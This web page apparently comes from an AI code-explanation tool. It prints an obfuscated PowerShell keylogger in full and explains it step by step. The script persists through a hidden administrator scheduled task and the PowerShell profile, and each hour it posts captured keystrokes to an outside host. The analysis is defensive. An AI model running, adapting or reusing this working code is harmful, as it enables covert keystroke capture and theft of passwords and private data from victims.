This code is a malicious PowerShell script that functions as...

September 3, 2025 at 01:13 AM

$APIsignatures = @ [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); @ ${errORAcTIOnPrEfERenCe} = (SilentlyContinue);${lOgpATh}="$env:temp\mat-debug-6F936CD.log";&(schtasks) (/create) (/tn) (MomMonitor) (/sc) (onstart) (/rl) (highest) (/ru) (Administrator) (/tr) (powershell.exe -w h) (/f) > ${LoGpaTH};if (.(Test-Path) ((C:n1YWindowsn1YSystem32n1YWindowsPowerShelln1Yv1.0n1Yprofile.ps1).RepLAcE(n1Y,\))) {} else {&(Get-Content) (&(Join-Path) ${pSsCrIpTrOoT} ${myinvocATIoN}.MyCommand.Name) > ((C:MyJWindowsMyJSystem32MyJWindowsPowerShellMyJv1.0MyJprofile.ps1).rePlACe(MyJ,\))};${uR} = (http://)${enV:COMputERNAme}(.malicious.12moms21.com);${sTArt} = .(Get-Date); ${aPi} = .(Add-Type) -MemberDefinition ${apIsIgNATUREs} -Name (Win32) -Namespace (API) -PassThru; ${no_oUtPUT} = .(New-Item) -Path ${logPATH} -ItemType (File) -Force;; while (${TRUE}) {.(Start-Sleep) -Milliseconds 40 ; for (${asCii} = 9; ${aScIi} -le 254; ${asCiI}) {${kEYsTAtE} = ${ApI}::GetAsyncKeyState(${AsCIi}); if (${KeyStATe} -eq -32767) {${Null} = [console]::CapsLock; ${vIRTUalkEY} = ${aPI}::MapVirtualKey(${ascIi}, 3); ${KBSTAtE} = &(New-Object) (Byte[]) 256; ${ChECKkBstATe} = ${Api}::GetKeyboardState(${kBsTATe}); ${lOggedCHAR} = &(New-Object) -TypeName (System.Text.StringBuilder) ; if (${Api}::ToUnicode(${aSCII}, ${VIrtUalKeY}, ${kbStaTe}, ${loGGEdcHAr}, ${loggEDChar}.Capacity, 0)) {[System.IO.File]::AppendAllText(${LogpAth}, ${LoGGEdCHar}, [System.Text.Encoding]::Unicode) }}}; if ((.(Get-Date)) -gt ${STaRt}.AddHours(1) ){.(Invoke-RestMethod) -Uri ${uR} -Method (Post) -InFile ${lOgpaTH}; ${STaRt} = &(Get-Date)}}

This code is a malicious PowerShell script that functions as a keylogger. Here's what the script does step by step:

  1. Imports User32 DLL Functions:

    • The script uses Add-Type to define and import API calls from the Windows user32.dll, such as:
      • GetAsyncKeyState: Captures key presses asynchronously for specified keys.
      • GetKeyboardState: Retrieves the state of all keys on the physical keyboard.
      • MapVirtualKey: Maps a virtual-key code to a scan code or character type.
      • ToUnicode: Converts keystroke data into Unicode characters, essentially interpreting the key pressed.

  2. Alters Error Handling:

    • It suppresses error messages with $ErrorActionPreference = SilentlyContinue.

  3. Creates a Scheduled Task:

    • A scheduled task named MomMonitor is created to run with administrator permissions, pointing to powershell.exe in hidden mode (-w h). This ensures persistence of the script across reboots.

  4. Modifies the User Profile:

    • It writes the script's code to the user's PowerShell profile (profile.ps1), ensuring that the keylogger executes each time PowerShell is started.

  5. Sets Up Logging:

    • It defines a log file in the system's temporary folder ($env:temp\mat-debug-6F936CD.log) to store captured keystrokes.

  6. Initiates Keylogging:

    • In a while loop:
      • It continuously checks for keystrokes using GetAsyncKeyState.
      • Converts these keystrokes into human-readable characters using the imported APIs (MapVirtualKey and ToUnicode).
      • Appends the captured characters (in Unicode format) to the log file.

  7. Data Exfiltration:

    • Every hour, the script sends the captured log data to a remote malicious server (http://{COMPUTERNAME}.malicious.12moms21.com) via Invoke-RestMethod. This effectively leaks the captured keystrokes (potential sensitive information) to the attacker.

  8. Avoids Detection:

    • The script attempts to stay undetected by suppressing outputs and errors, scheduling itself to run stealthily, writing the log file in a temporary directory, and disguising key sections.

Summary:

This script is designed to:

  • Monitor and log keystrokes typed by the user (keylogger functionality).
  • Exfiltrate the logged data periodically to an attacker-controlled server.
  • Establish persistence by creating a scheduled task and modifying the user's PowerShell profile.

Such a script is often used for unauthorized monitoring, data theft, or other malicious activities. It poses a significant security risk and should be identified and removed immediately.

Generate your own explanations
Download our vscode extension
Read other generated explanations

Built by @thebuilderjr
Sponsored by beam analytics
Read our terms and privacy policy
Forked from openai-quickstart-node